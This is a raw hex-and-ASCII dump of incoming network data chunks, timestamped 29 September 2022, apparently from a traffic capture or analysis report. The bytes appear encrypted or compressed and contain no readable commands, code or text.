                                                                                                                                                2022-09-29 12:51:28 UTC6744INData Raw: 54 8c 3a 36 a9 db d8 26 28 e1 fc 0a 42 65 f5 e1 0a 10 57 f8 90 de fe cf e6 6d 2c f4 3a cf 36 18 c0 7e fe 28 73 3f 82 a5 69 69 9c ba 66 63 f7 96 24 7a a2 d9 d2 11 0b 65 d5 c3 9e 66 f5 7d 43 8c 57 34 ae 69 91 6d 26 db 20 a2 fc 06 ad ba 39 ee e1 ab d0 c0 af 3b 16 2c 22 ac 40 f5 18 e6 f9 ca 6f a9 a9 c6 17 6c d5 ca 87 26 ac 17 34 e2 92 fe 7d 8c 54 b8 d6 ed bd b6 a2 6d 65 62 26 c6 0d 34 16 7d b1 8f 01 80 13 cf f7 2d 96 9b 29 00 3f f8 ec 82 54 12 fb 0a ef b9 64 43 d3 bc a4 9f aa 7e e3 ce 08 9f d4 cb 43 35 5d d2 01 e0 14 3e db 0a 52 0b 8a d2 f6 32 08 04 d9 6a 69 31 0a bd e6 8e c7 ff 90 e0 b3 90 2e 95 08 1e 5a 9e f7 b2 cf c4 58 13 1b 87 5a 1e a6 fd f8 01 bd 67 00 1f 1d 79 b9 53 21 36 60 0d 2e 4e 12 ef 09 0a f8 63 32 e5 f9 1e 84 5c 9d 64 34 d8 8c 06 31 4d 09 a7 31
                                                                                                                                                Data Ascii: T:6&(BeWm,:6~(s?iifc$zef}CW4im& 9;,"@ol&4}Tmeb&4}-)?TdC~C5]>R2ji1.ZXZgyS!6`.Nc2\d41M1
                                                                                                                                                2022-09-29 12:51:28 UTC6760INData Raw: 60 06 4a 58 ae 15 f1 eb f0 98 a1 c0 bb 3f fd c4 33 80 0d df 7c 65 43 44 7b ce 1d 78 e6 1d 1d 6f 8e d1 cd af 3f c8 5d 49 0c 95 dd 51 56 66 a2 a2 11 40 4e 09 47 19 c6 2d c1 44 04 45 be 36 ef 53 c3 5a 4c b7 d0 5c 61 ce 0c af a5 09 f2 65 6d 5f 3f 4e bb 3e d7 29 51 58 1f dc cc 17 69 4a 54 8f dd 6f 4e d2 bd c7 03 69 60 0f e0 db bf a1 28 8f fa 17 a7 04 d6 09 0a e5 0f 0c 64 04 ad fa ab ae 9a 3d 7f 00 dd 94 e9 b1 de 7e 17 52 e9 db fa 7d 7b e3 a5 b5 1d be f7 62 c3 29 42 0f 7d 60 9e 75 b0 92 cd 8a bb 06 48 71 8f d2 0e 63 2d 0a 18 a0 09 8a b9 83 3e a6 bb 60 3d 66 a6 9a 84 e0 a6 dc cd fa 4f 1d 2a 25 65 b7 be cf 63 fb 38 4b 7f f6 fd d3 92 19 b6 3f 43 2b 06 d0 ac d7 c8 b9 c6 95 c1 df 0c 10 d8 07 8c a7 8c 86 eb c3 bf d8 80 40 25 1b bd 9e c1 67 13 67 6a 3e 70 a3 76 14 2c
                                                                                                                                                Data Ascii: `JX?3|eCD{xo?]IQVf@NG-DE6SZL\aem_?N>)QXiJToNi`(d=~R}{b)B}`uHqc->`=fO*%ec8K?C+@%ggj>pv,
                                                                                                                                                2022-09-29 12:51:28 UTC6776INData Raw: b1 a1 52 f8 a3 2f 25 9a ad 92 d6 a7 7e 00 6f ab 17 ae 3f bf 36 12 eb 6a c6 e4 f0 48 5d 4a 1a df 54 92 c1 b8 c4 3a 83 4d 90 2d 90 58 6d c7 6b 35 2d 9e 44 01 40 0a f2 f0 dd a4 a9 ba 27 19 1d 19 2d 92 b7 30 15 1c 74 80 0b 29 1b 58 b2 aa 36 3e 29 ee 02 26 af ee 94 c2 ed d4 b4 81 0a ae b4 f4 4f 4d b2 4f fa 23 cf 48 dc 88 2f 1e 22 c4 b4 b0 06 43 ff bf e3 4a 48 85 c1 16 3b 89 bc 64 cd 75 37 c7 47 d9 95 20 ca 0e 4b 90 35 16 fc e5 c6 d7 15 c6 07 a2 b7 06 b4 e3 43 91 bf 0a f2 a0 4c bd 99 ed af 74 03 97 25 35 c6 50 f1 22 78 c3 fa 7a ac a7 1b 22 cf 5d 21 97 ae c1 95 df a0 52 1d 2c 5f bb ce 01 ef 00 ef 65 af 9d 8c 72 6e d4 c9 29 f9 5d 89 f8 4a ee 88 55 e0 a8 4e 9f 60 f1 26 64 de c0 0f 0e eb 63 37 3d 04 37 4e be 01 0c bf e9 3d ab f5 e5 5a ff c3 22 39 41 45 ca 18 d4 a5
                                                                                                                                                Data Ascii: R/%~o?6jH]JT:M-Xmk5-D@'-0t)X6>)&OMO#H/"CJH;du7G K5CLt%5P"xz"]!R,_ern)]JUN`&dc7=7N=Z"9AE
                                                                                                                                                2022-09-29 12:51:28 UTC6792INData Raw: 62 79 d1 0b a0 8c bf d1 ba 96 38 95 55 3d 67 ed 51 f2 0f 33 99 33 05 c1 6a f3 4b b9 38 01 05 93 16 d0 ae 3e bf b6 8c c5 82 4d 96 b8 e3 31 4f 90 73 89 9a 70 f1 9e 55 f1 21 9f 76 e8 3c 3c a6 31 b0 dc 9a 22 2e a1 85 18 06 7d 29 40 f7 cf 53 c6 fc c1 c8 15 fe 36 e7 40 66 a3 17 c8 dd 41 c7 df dc 94 29 55 8d e8 5d be b9 54 30 6c 30 13 05 99 05 56 67 e1 82 20 0d 48 12 b4 c5 6c 30 38 ad ad d7 6a 9b 2e 6f 4d c1 de 3d 05 0f 06 08 20 c4 32 19 fc e2 34 7c b8 a2 36 a2 b8 3a 53 b8 47 72 67 3c 59 08 f5 4e 72 fa 0d 7c e7 1e 54 93 bd 82 f9 9e 38 1f 3a 79 6d 99 0a 68 31 1f 1c 86 8e 00 48 f3 97 24 d5 d2 46 b2 0e 2f f0 23 70 15 ea d9 2e 39 58 b9 c0 d2 1d 4e c9 41 cc ff a2 09 a1 95 d7 ca 10 77 1f 35 95 16 09 84 e0 34 c8 42 5b 66 23 c0 c2 ba 84 cc de 78 c8 62 77 b6 48 cb 98 06
                                                                                                                                                Data Ascii: by8U=gQ33jK8>M1OspU!v<<1".})@S6@fA)U]T0l0Vg Hl08j.oM= 24|6:SGrg<YNr|T8:ymh1H$F/#p.9XNAw54B[f#xbwH
                                                                                                                                                2022-09-29 12:51:28 UTC6808INData Raw: b4 5e 60 bd 06 9f 41 9b 8a 42 b3 8a bd 7b ea 2a 58 8a 6b 5f 14 58 07 1b 23 a0 45 2b 8b 49 03 57 b6 b0 30 f3 ef 6d 4d 6e 89 f6 4d 29 5c 14 9e ef b8 89 bc 6a 30 4f bd 28 55 ae ce d7 68 26 c8 76 47 55 47 94 8d 25 30 16 3e 19 f7 8d 29 88 3b 7d 42 8c 7a 22 09 c0 82 67 b3 97 82 6f 26 56 2d dd f4 78 c4 a8 9c f2 d3 7b 2c 38 91 19 f6 88 86 56 84 08 e0 6c 96 76 fa 5d 23 39 29 97 10 c3 fd 2c d7 4e d3 33 50 38 92 cf 7d cf 63 db 20 75 07 f4 54 93 62 07 76 1c 0d 01 ec 86 c2 b6 28 09 6d 41 87 0a 08 b0 5d 3c 4e 96 31 6d dd 0e a8 48 ff cd 72 0b 25 92 03 7f ad 82 06 07 89 38 06 c3 2f de 58 cc c9 5f 8f 7f cc 0e 62 aa 89 0f 9c ee 1c 18 55 e0 c0 c6 af eb 46 bd 8e ce 19 22 de c9 f3 21 b3 57 6c 58 0f 83 bd 65 65 dd 40 f0 e4 a6 48 46 e2 92 74 6f 1c 64 de f6 6f b8 1c 26 0f 9f 90
                                                                                                                                                Data Ascii: ^`AB{*Xk_X#E+IW0mMnM)\j0O(Uh&vGUG%0>);}Bz"go&V-x{,8Vlv]#9),N3P8}c uTbv(mA]<N1mHr%8/X_bUF"!WlXee@HFtodo&
                                                                                                                                                2022-09-29 12:51:28 UTC6824INData Raw: c6 c8 1a 46 f8 15 91 3f e6 f8 15 6e 57 94 d1 6b 11 5d 07 90 7c d4 db a0 2c d7 73 28 05 28 29 af 55 1b ea 99 89 fd 96 2e 9e 95 ba fc 6c 2c 2a c6 ce ce 37 a8 fb 9f 09 b5 32 77 c0 93 26 a5 1d b9 c0 e1 3c e0 b6 f8 c3 df b8 57 70 b3 2c c9 49 c6 cc ea e1 67 aa a4 23 96 80 5c 8c d9 6e e2 88 b8 d8 cd 60 85 0d 18 36 58 ee 32 e7 96 77 69 a0 74 c3 1f bc fb 34 fc 89 f1 95 81 f7 d2 00 1d b2 57 81 f4 1c c3 99 fb ab 49 1c 8d cd e4 89 59 8d 31 a0 02 dd ee ff e4 3e 7f 0d a3 c8 4f 7c e0 ab 8a a7 16 e6 09 4d ea c3 49 46 49 f9 41 14 37 6e 55 8e 3d 7c a4 0e 8d 7c a6 8c 39 aa a2 67 2f d3 96 28 ff ac ed 1b 77 47 40 fd a2 78 b7 67 64 fa 9f b2 40 40 9b 3b f1 55 4c c1 3a a0 33 18 c6 91 7a 4f 21 1a bd 37 3d 65 97 07 9b da 7a 8a 17 a1 2c 2e cd 82 4d 38 eb 04 98 6a 71 c0 6e d2 ef 3a
                                                                                                                                                Data Ascii: F?nWk]|,s(()U.l,*72w&<Wp,Ig#\n`6X2wit4WIY1>O|MIFIA7nU=||9g/(wG@xgd@@;UL:3zO!7=ez,.M8jqn:
                                                                                                                                                2022-09-29 12:51:28 UTC6840INData Raw: 66 6f c9 85 b0 5a 11 97 49 71 6d 87 18 36 a1 d9 4b 1c 9e 21 c5 d6 2b 5d f3 ec f4 58 11 61 f6 33 16 2c 43 9e e2 c7 a0 07 db 5c 6a c4 16 34 30 2a 2e 4a 99 19 cc cc 79 4a 17 03 aa af 0d f5 6a ed fd d8 59 af 50 5f a8 bb 37 03 d0 3d 6e 1f 6b 78 16 95 c3 79 7a 38 33 86 29 e1 a4 cd 17 a8 2b 8d 60 35 2a b3 14 f4 e0 81 b4 6e ed d5 47 5e d3 39 1b dc 34 3c 30 97 b2 9b e7 28 80 29 08 b5 fc 48 29 be bb f5 8c ec b3 2b 62 92 b4 c8 93 5e cb 74 28 dc bc 90 72 c7 7f be 0c 2a 44 03 c1 d9 8e 72 ac 1f d8 1f 65 88 0f c0 1d fd 87 eb 24 fc 08 0f 79 a5 b8 58 a5 58 60 b0 0c 07 a6 22 bc fd ed 24 90 b8 3c 9a 94 d0 be b6 53 b8 12 74 36 57 95 77 18 bb 2e f1 d2 2f 91 72 4a c6 e7 29 10 2a a5 d6 a4 6b 45 5c d8 b6 67 9e 6d 67 b5 52 62 d9 06 21 85 4e f5 29 a2 b8 24 5e c9 2e d4 75 fc a9 27
                                                                                                                                                Data Ascii: foZIqm6K!+]Xa3,C\j40*.JyJjYP_7=nkxyz83)+`5*nG^94<0()H)+b^t(r*Dre$yXX`"$<St6Ww./rJ)*kE\gmgRb!N)$^.u'
                                                                                                                                                2022-09-29 12:51:28 UTC6856INData Raw: 95 e5 95 5c 15 dd 7f 45 08 ab 28 a3 ce 9d f7 c0 8c 89 7c c3 1b f0 81 15 aa 3c 43 a6 d8 3e af cc 20 53 cf 49 ce 34 a2 11 c7 80 8e f8 c3 25 b1 7a 5d ad 6e fb e8 f8 54 26 82 2e 73 bc af 7e f3 32 42 fe 31 04 ae 19 15 a9 e0 5f 21 85 93 c8 a6 d7 3d e9 aa b3 01 e9 86 5a 6b c5 25 fe 00 0e d8 39 07 89 2e 12 ff 61 1b 23 f8 6f 5b 4f 0a db a4 bd a3 4b 60 e8 13 3e 3f 49 35 08 0a fa 1f e2 ce c0 f5 c1 7e a1 35 57 ee 28 a2 f4 30 86 2a ef cc c7 72 6a cb 18 14 88 45 25 2d e4 c0 26 31 ff 75 9f 1f 83 a7 9e fd 99 a1 d1 01 65 63 3a d2 9c bf b2 a7 0c 92 97 43 8f b5 8c 79 6d 7b 53 f9 7a c7 50 cd 5e b7 80 2f 6a 67 01 be bf f9 c4 b6 bc e4 76 fa 7a ba f3 22 3d 56 28 a9 b4 d0 77 bc b4 ff d2 13 86 33 d5 ff da aa ad d1 56 e6 85 3c b6 b7 36 43 c1 0b 0b a0 76 39 0a 48 4c 3e a4 fa 3d f7
                                                                                                                                                Data Ascii: \E(|<C> SI4%z]nT&.s~2B1_!=Zk%9.a#o[OK`>?I5~5W(0*rjE%-&1uec:Cym{SzP^/jgvz"=V(w3V<6Cv9HL>=
                                                                                                                                                2022-09-29 12:51:28 UTC6872INData Raw: 08 67 40 f8 3a 43 27 99 8c a0 0a 01 86 1d e2 2b 95 71 ca 2d 06 63 a8 86 5c 97 2b f7 46 23 4d aa 68 0f 2e 23 13 27 80 86 68 b6 83 d5 83 29 37 27 ed ab ad 27 45 e5 33 08 2d 19 8a a2 df bf 4a 19 0c a8 90 04 ad 76 06 5e 28 65 c0 c7 84 a5 52 fd 5d 37 0a 8f 5a ce cb 29 d3 c3 80 c3 e0 40 1e 85 41 5c f4 ba 62 75 8a 07 ab 0b 9d 06 9e d5 d7 35 c4 5c 96 7e 45 4a a7 76 66 1a c6 bf 79 fb 89 27 47 2e 26 6b 03 14 40 29 66 9f 81 77 89 fc ac 8c ff cc b9 a1 2c 30 da 47 86 dd e9 ca 45 bc e6 7c cf 62 a2 d8 e1 2a ce 6f e5 57 6c c2 77 c4 bf 42 1e 0c d9 52 20 9d 74 df c9 58 22 dc ed 01 48 2a 54 94 32 5d 75 eb b2 60 c8 27 c0 de 52 d2 6e c3 20 97 f2 5a 23 89 6a 2f 4e 5b b6 6d 20 ee dd c2 38 e3 b9 fb 4b 0c 95 43 98 43 42 4d d6 90 fb 16 e0 6f c6 fc 23 e5 0b 62 49 9f be da 53 49 20
                                                                                                                                                Data Ascii: g@:C'+q-c\+F#Mh.#'h)7''E3-Jv^(eR]7Z)@A\bu5\~EJvfy'G.&k@)fw,0GE|b*oWlwBR tX"H*T2]u`'Rn Z#j/N[m 8KCCBMo#bISI
                                                                                                                                                2022-09-29 12:51:28 UTC6888INData Raw: 65 1b 85 97 9d d0 57 3c fb 73 87 de c1 03 4b 53 d5 88 af e0 ff 0d 6c 80 84 b1 70 32 02 74 f0 af 6b 1a 4d d1 d1 4e 8c e3 eb c9 1e f5 38 b0 df ec 10 a6 61 02 69 78 e4 11 16 ed 1c a8 40 65 db db a9 3b 13 4d 7b e5 53 1f 2f b3 52 6e aa 5d a8 23 b6 5e 07 e3 10 22 5d 67 91 a8 c0 1e 8f 53 bd 6c b2 f7 3b c9 54 36 4c a8 02 3b 4d 68 58 0c ef 3c 0b 83 9b 63 6e 0b 75 0a 60 b8 4f f5 c8 cd 17 74 8e 53 d4 62 24 c2 4e 5d cf 6f 43 06 75 ce 50 3c 9e 23 a1 2f 3d 0a 9a 04 6d b6 03 e7 ce 28 22 33 95 31 a2 dd 21 09 ee e0 60 13 18 45 2f 50 de b3 c8 6e 36 37 f5 68 08 8a 7c ce 08 b2 56 84 8a e6 87 74 cc ee b8 75 cd eb a0 20 4a c4 18 13 91 88 7e 06 1f f1 71 36 1d 69 4f fb b9 8e 5b 60 f4 40 25 d0 f7 0d 57 70 42 1e e4 1e 5a b2 9f 8d 48 04 9b c9 73 f3 84 05 fe a9 d3 97 39 a1 5c d9 ff
                                                                                                                                                Data Ascii: eW<sKSlp2tkMN8aix@e;M{S/Rn]#^"]gSl;T6L;MhX<cnu`OtSb$N]oCuP<#/=m("31!`E/Pn67h|Vtu J~q6iO[`@%WpBZHs9\
                                                                                                                                                2022-09-29 12:51:28 UTC6904INData Raw: 69 1d 7a fe 3e 35 61 43 95 98 86 81 36 24 7f ed 71 ed 6f 20 15 86 84 f3 6f 01 9f 0f e4 70 e0 ad d8 90 a7 c0 be 90 3e 71 5f e2 45 97 42 ef fc b6 1b 69 c9 48 06 4f 6d ea 70 08 13 b5 0e e6 3d ed 92 7b a8 50 14 c8 84 f4 d8 4a 98 bc 49 9b e0 49 27 0a 98 df 92 86 22 31 f8 cc d7 ed 37 bc e6 0b 17 2c 4a 5f 86 ad 24 b4 e7 a7 49 49 5e 9b 26 dd f0 a5 2f f1 32 42 8d c1 ed 5b 5b 61 46 aa 3d a8 cf b0 d8 b5 9f de 5c 92 c7 b0 5e a1 5a f4 de ba dc 80 f1 22 19 25 51 fc 05 13 08 e0 b6 b4 35 a9 1d 2c 10 dd 2d 80 01 09 b6 ec b2 40 dd 19 94 01 5a bd b4 98 6e 4c 0b 18 43 28 13 50 bb 7e 62 20 4d a0 46 14 f6 59 89 0e 9c 4a 4e 94 71 a6 f4 8a af d8 07 1a 1d 48 de c0 3c 17 d8 6a 31 dc 46 07 c1 e3 b8 d2 bb 4f 9f 4d 5d b5 8d 6a 5b fa da 84 68 ee fc ff 76 98 f6 9f 9d 3d ef 90 2f ca 82
                                                                                                                                                Data Ascii: iz>5aC6$qo op>q_EBiHOmp={PJII'"17,J_$II^&/2B[[aF=\^Z"%Q5,-@ZnLC(P~b MFYJNqH<j1FOM]j[hv=/
                                                                                                                                                2022-09-29 12:51:28 UTC6920INData Raw: c5 5c 51 e1 ac 66 68 c1 00 61 d3 77 fa ab 4b c9 0e 36 e3 1e 55 bb 39 ee 74 a9 4d da 78 16 44 36 3d 2b ce bb 7c 9e e6 1f b9 39 fe b7 f1 5a f2 b4 15 ef 57 a6 5c 83 7a 3a e6 af 19 9a 0b ef 6c 85 c5 00 e4 18 f5 bc fb 75 c2 bc 88 9b 6f 96 49 82 66 60 44 9c 60 9f 01 f6 7e 89 f5 db cc 51 9a 14 f0 70 6d de 09 1c c3 3d 3d ab c9 01 96 95 23 54 96 6b ea 63 a7 f1 e9 0f 3a c3 3a 37 62 07 92 84 79 0d 83 6f e8 d9 cd 08 c1 ea f9 de 65 e1 79 98 26 38 86 05 d0 82 c8 fa 2c f0 dd 93 f9 68 8c b8 5d 3f b4 80 49 34 78 12 4e 7c 2a 49 7d f5 0d 9b 46 96 46 ec e1 66 ce 16 75 97 c3 35 4e b3 24 d3 74 41 d6 49 c2 a5 94 04 b8 ab 20 e1 df f9 e4 0c b1 57 77 1a 71 e0 d5 08 bf 3d d2 2a 49 62 e6 d5 21 39 f7 74 7c e1 b0 9c bd f6 ce c2 4c 5b 84 72 d9 0d a0 5a c8 d2 02 05 bc 60 47 11 c0 6d 7a
                                                                                                                                                Data Ascii: \QfhawK6U9tMxD6=+|9ZW\z:luoIf`D`~Qpm==#Tkc::7byoey&8,h]?I4xN|*I}FFfu5N$tAI Wwq=*Ib!9t|L[rZ`Gmz
                                                                                                                                                2022-09-29 12:51:28 UTC6936INData Raw: c2 6b 2f 75 15 7a 55 b4 d0 fe 0a da f4 01 06 8f 2f 1f 40 91 4b 96 ca 63 97 4d 96 83 b2 36 43 a4 46 99 75 52 62 52 12 06 8e ec 1b c6 7f 25 79 9a 3b 92 a6 43 d1 21 a1 e5 6a bd 88 75 22 e5 1b 29 c8 a5 77 40 64 10 77 ab 28 be 45 81 ab 28 01 30 f3 e1 98 26 1c 6a 75 c4 fb a5 fe da b9 b5 d4 06 cd f0 71 12 98 71 7b b3 0e 69 69 13 51 9e e5 5f d1 50 84 f5 00 74 d0 df af b7 dc b2 38 2d bd 95 f7 9a ab 3a 42 a6 1a 1a 56 9c 2a 0a 89 0d a4 02 ba 7a 03 d8 bb f9 21 a0 47 74 4f 76 14 e2 35 7c c1 21 4d 31 b7 71 92 49 13 e4 d6 15 c6 93 ec 9a f8 4f db 6d 82 b9 3e 1e 93 57 3a bd 73 1f 83 aa e7 0b 5b b0 c7 b7 21 bb 7f 6b 45 9c 86 81 e7 a9 aa c9 0e fd 34 44 b6 67 81 d0 52 a7 dd 7b 59 81 41 ac a2 58 d5 40 2e 51 a9 de 21 4e 5c 41 08 7d 05 73 61 55 f9 19 73 a6 f6 0e 0e 0c 02 3c 64
                                                                                                                                                Data Ascii: k/uzU/@KcM6CFuRbR%y;C!ju")w@dw(E(0&juqq{iiQ_Pt8-:BV*z!GtOv5|!M1qIOm>W:s[!kE4DgR{YAX@.Q!N\A}saUs<d
                                                                                                                                                2022-09-29 12:51:28 UTC6952INData Raw: 8a b4 6d 98 49 59 e2 20 9d d6 68 70 40 f3 eb 29 47 ea 51 20 90 4c 13 41 85 f5 38 c7 56 41 44 83 6c aa 86 cd fa 39 2b 65 f8 05 a8 7c ec 5a 7d 3f 5d 21 0e 8a c4 7b d6 2a 60 51 bb 5f d0 6e 05 58 96 ce 95 b6 87 38 ff 6f 23 6e c8 85 fd 0d a8 ed af 66 04 f9 5c 2b a0 ea db 0f 52 fd 3a 42 64 36 13 e8 09 d4 2f 9f 7c a1 11 36 0a 80 89 a6 28 85 4a f5 3f 03 7f 59 75 a6 f5 b2 e1 69 9c f9 95 73 9f 4a d7 70 83 a2 5f 29 73 7b 81 27 c1 ed 37 89 20 ef ba ba fd b7 b3 90 1f 1c e8 a1 66 cc e5 26 ee 9e 48 88 a0 15 c9 26 fe b9 9e 0b dd ae 28 aa 85 ab 2a 5c 97 76 c5 b8 1a a0 65 0b ee d7 30 25 0c 61 d8 0e dd f8 41 c6 e6 22 4c f5 79 1e bf 84 c4 9f 6b 78 19 09 5d 40 3f 4c 0f f8 e3 99 73 7d bb 00 81 f9 fb 97 0d b7 59 06 56 20 51 95 6e 70 71 34 33 db df aa 67 54 26 7f 8e 58 6d 62 f9
                                                                                                                                                Data Ascii: mIY hp@)GQ LA8VADl9+e|Z}?]!{*`Q_nX8o#nf\+R:Bd6/|6(J?YuisJp_)s{'7 f&H&(*\ve0%aA"Lykx]@?Ls}YV Qnpq43gT&Xmb
                                                                                                                                                2022-09-29 12:51:28 UTC6968INData Raw: 58 87 56 0f b4 4b 4c bb d7 51 30 b2 e8 59 bd 41 1d 77 62 96 44 a8 2b f1 b6 3f 9e c3 bb 76 46 86 82 be 0d 79 9d 3d 4f 7c e0 ee f1 4f e2 d1 f8 fb 49 34 b8 01 cf 07 e6 1e b3 65 76 53 bd 13 c7 a6 98 8b ec b3 3c 72 e4 97 48 b5 7a e8 44 f0 d4 5c db 26 db 8e d1 7a 71 0a dd b5 9a 80 fd 02 22 a1 5c 46 2e bb 57 53 24 60 a3 e8 49 0c 9b 2c 17 50 f3 50 b5 bb f5 62 d3 cd b7 c2 0d 10 95 a0 3f 53 bb 87 5f 2c 4f 60 1f 3b 53 ac a6 54 1b 2b 9f ea 0f ae 69 c8 9e 8e 64 44 1e 84 10 e1 ab c2 1e d2 d9 32 82 ab 7e 53 da bf a8 b7 68 04 a3 e5 ba 1c 19 04 58 fe a3 d7 86 ea 13 c3 e9 fe c3 e8 71 f8 85 66 23 3d 2a 2b 4d 5f 37 ee cb 87 b4 04 61 14 6c 3c 50 81 18 c2 fa cc 5e 33 34 c9 5e f7 f0 6c 7b 1d f8 fb 39 1f 14 3b 00 21 eb 79 57 a1 85 28 53 a5 41 a6 9b eb b3 4c be 00 e8 8a 3a 67 25
                                                                                                                                                Data Ascii: XVKLQ0YAwbD+?vFy=O|OI4evS<rHzD\&zq"\F.WS$`I,PPb?S_,O`;ST+idD2~ShXqf#=*+M_7al<P^34^l{9;!yW(SAL:g%
                                                                                                                                                2022-09-29 12:51:28 UTC6978INData Raw: a3 28 d8 83 3a 5d c6 c8 c8 63 36 a7 c3 57 1c d3 f8 f2 05 0e 03 e7 f2 f9 f0 fe ce f3 05 db f4 db 58 60 dd 69 63 f0 d1 ee fd bb ae 46 b2 a2 44 5b 39 f0 d5 38 27 f4 b5 f2 65 4b 8e 18 10 62 b5 00 8e 16 e5 7f 28 7a 3b a2 4b 12 d9 00 2b 44 42 98 c2 dc 2f 6b 59 cc 99 54 1c 0f 86 10 33 01 2b e0 8b af 48 0e 9e 3d 0e 6d 03 d0 1a 8a bb 51 d6 22 3e 52 dc 78 7d c1 f2 d7 3d ac 28 a3 78 1c 8b a7 67 f1 1f 11 65 60 f3 3b c7 fc 34 77 01 dd b9 6c 42 16 d5 22 ad 84 83 a6 53 d6 d9 f3 72 8d 7e bd 4f a4 a8 21 f8 99 c3 f8 91 53 72 3b 98 33 71 29 93 4d 10 fe c1 46 0c 82 58 ec 0e de 11 64 13 91 f4 38 01 f7 c4 e1 12 84 a6 a5 72 4f 4d 3a e4 52 82 61 0c 0b dc 07 51 71 16 e5 e2 15 cd 8a 91 9c db b4 d7 9b dd 88 54 b2 e3 ed 03 e0 6b 2e 13 ca a1 5f a3 c8 d7 3c 84 1e 86 a7 7d 26 66 6c a9
                                                                                                                                                Data Ascii: (:]c6WX`icFD[98'eKb(z;K+DB/kYT3+H=mQ">Rx}=(xge`;4wlB"Sr~O!Sr;3q)MFXd8rOM:RaQqTk._<}&fl
                                                                                                                                                2022-09-29 12:51:28 UTC6994INData Raw: e4 f3 6f e9 f3 07 b5 d4 3c 2e 6d f6 52 ad 77 54 95 f4 aa c6 6d 89 b0 f0 e9 91 eb 3c 53 b5 ab 43 76 98 41 8b 69 f8 3d 08 87 7f 03 ee ca dc 63 a5 9e 43 c8 6f 87 ec ed f9 03 86 c8 90 a0 4b d1 20 2b d3 79 f9 66 78 e1 d8 9e 60 26 48 d9 3a f7 f4 87 65 04 66 76 11 1a d7 84 9e 76 0c fe 3f 3f a7 af b4 bf e0 21 cf fb 2c 7a 50 c6 9d 66 08 94 08 ce bd 9d 3f 33 66 ad 91 b6 ff 18 22 70 4a d5 e0 2c b9 fc 57 91 84 a0 12 ff 64 6b a0 16 09 58 3a 66 8f 85 84 19 db 2b b4 bb 38 49 6d 9e 7f 3a 16 a9 41 93 ca 56 a5 04 51 c8 85 aa c2 c4 21 cd f8 05 e6 66 13 9d 38 64 b8 da 2f b6 be e6 38 8f 72 10 62 d5 01 12 e6 d6 16 86 6f ef d6 8f e7 06 28 6c ca 4d 4a 0b 28 c5 83 62 2b 49 a8 38 60 fb 8f b5 b8 5a d8 61 bf 5f f6 86 de 3a 4b 2e 01 26 a6 86 a5 85 84 1b 39 85 34 db 1f 4e 6f f4 cc 3c
                                                                                                                                                Data Ascii: o<.mRwTm<SCvAi=cCoK +yfx`&H:efvv??!,zPf?3f"pJ,WdkX:f+8Im:AVQ!f8d/8rbo(lMJ(b+I8`Za_:K.&94No<
                                                                                                                                                2022-09-29 12:51:28 UTC7010INData Raw: 86 c2 31 04 57 0f 54 36 39 72 9d 85 e9 9b 4c f5 44 11 fb 61 6c 4e 60 4d dc 5a 81 32 03 e7 7a 5f 93 bf 86 26 a8 7d 82 5e ba fa b6 da be ff e5 08 7c ae 2a c3 30 62 aa 61 1d 06 8d a1 14 26 56 8b a7 e6 7f 75 03 63 ba 3f 2a 67 5c a7 61 eb 72 b7 aa c6 ba 4c d6 55 d4 80 cc 0e 7d 1a 3c 40 9b b9 2a cb ca b2 c0 fa 3f 5d 3a 91 30 94 25 33 ce 96 80 c2 db 12 68 30 12 81 51 7b 98 aa 42 74 d7 46 c2 3a bc 03 90 24 c5 e2 f7 61 b7 1a 7c 71 68 82 ae 33 85 d0 98 70 92 ab 7c e6 7b e2 3a 97 f4 cc f5 88 7f e2 ae bb d6 83 10 bf 53 68 db 8c 9f 6c e1 b0 c3 c0 e5 35 3f da 96 9e 7c 95 bf 0b 1a 15 51 55 48 d9 5a 4c c8 40 e6 45 09 b5 b5 74 c7 93 54 0a a2 e5 17 f2 b4 92 0b d7 e6 8c d1 e7 1f e0 1b 52 98 fe 01 09 41 c7 8f 96 86 9b 56 2a 39 09 60 fa 63 92 b5 c5 57 44 ae ff 21 48 a2 0b 59
                                                                                                                                                Data Ascii: 1WT69rLDalN`MZ2z_&}^|*0ba&Vuc?*g\arLU}<@*?]:0%3h0Q{BtF:$a|qh3p|{:Shl5?|QUHZL@EtTRAV*9`cWD!HY
                                                                                                                                                2022-09-29 12:51:28 UTC7026INData Raw: 36 84 42 d6 32 e9 3b cb 11 61 5c 23 0f 61 57 75 ce cc e8 d7 6b db 5b b4 46 ac 1d f5 a8 e5 8b 61 9b 97 52 f4 44 b5 50 9d fb 7f 8b ec 24 67 01 87 aa 77 ec 9b 59 7d 07 29 1f 8d c0 d3 0c 1c 1e 0c 90 b1 0b 2b c8 a4 db 57 02 c2 67 5b d9 16 e0 06 e2 21 18 34 1e c6 ae b4 ca 70 6d 7c 5b 7b cc 8c 4a 1e 90 56 e3 78 aa 99 a4 f5 3b da a7 16 37 2c 8b f6 b1 29 3c a0 9b 06 f9 7d 6b 27 91 5d a3 9b b2 06 e9 04 97 7b f5 a7 4b e7 6c df 7c 89 cc ed 2e 7a 10 ad 55 f8 16 05 91 9c ba 5b 3a 30 24 51 18 19 6b 84 a8 17 a2 27 f3 40 b1 70 eb 5c 9a 7f f3 f4 ee 8f 47 73 46 ae 1c 1d c4 7e bc 9d 65 1b 59 28 69 86 6f 57 7c 83 3b ed 88 24 bc 63 73 50 22 93 70 bd b0 ea 99 b4 3e 9b 77 d6 8e 83 4b f0 1d 83 53 e7 45 40 b0 05 cf dd bd 74 a3 37 fd ea 1f b9 6b 61 56 6c 25 d7 d0 c8 b3 f9 c1 e4 1b
                                                                                                                                                Data Ascii: 6B2;a\#aWuk[FaRDP$gwY})+Wg[!4pm|[{JVx;7,)<}k']{Kl|.zU[:0$Qk'@p\GsF~eY(ioW|;$csP"p>wKSE@t7kaVl%
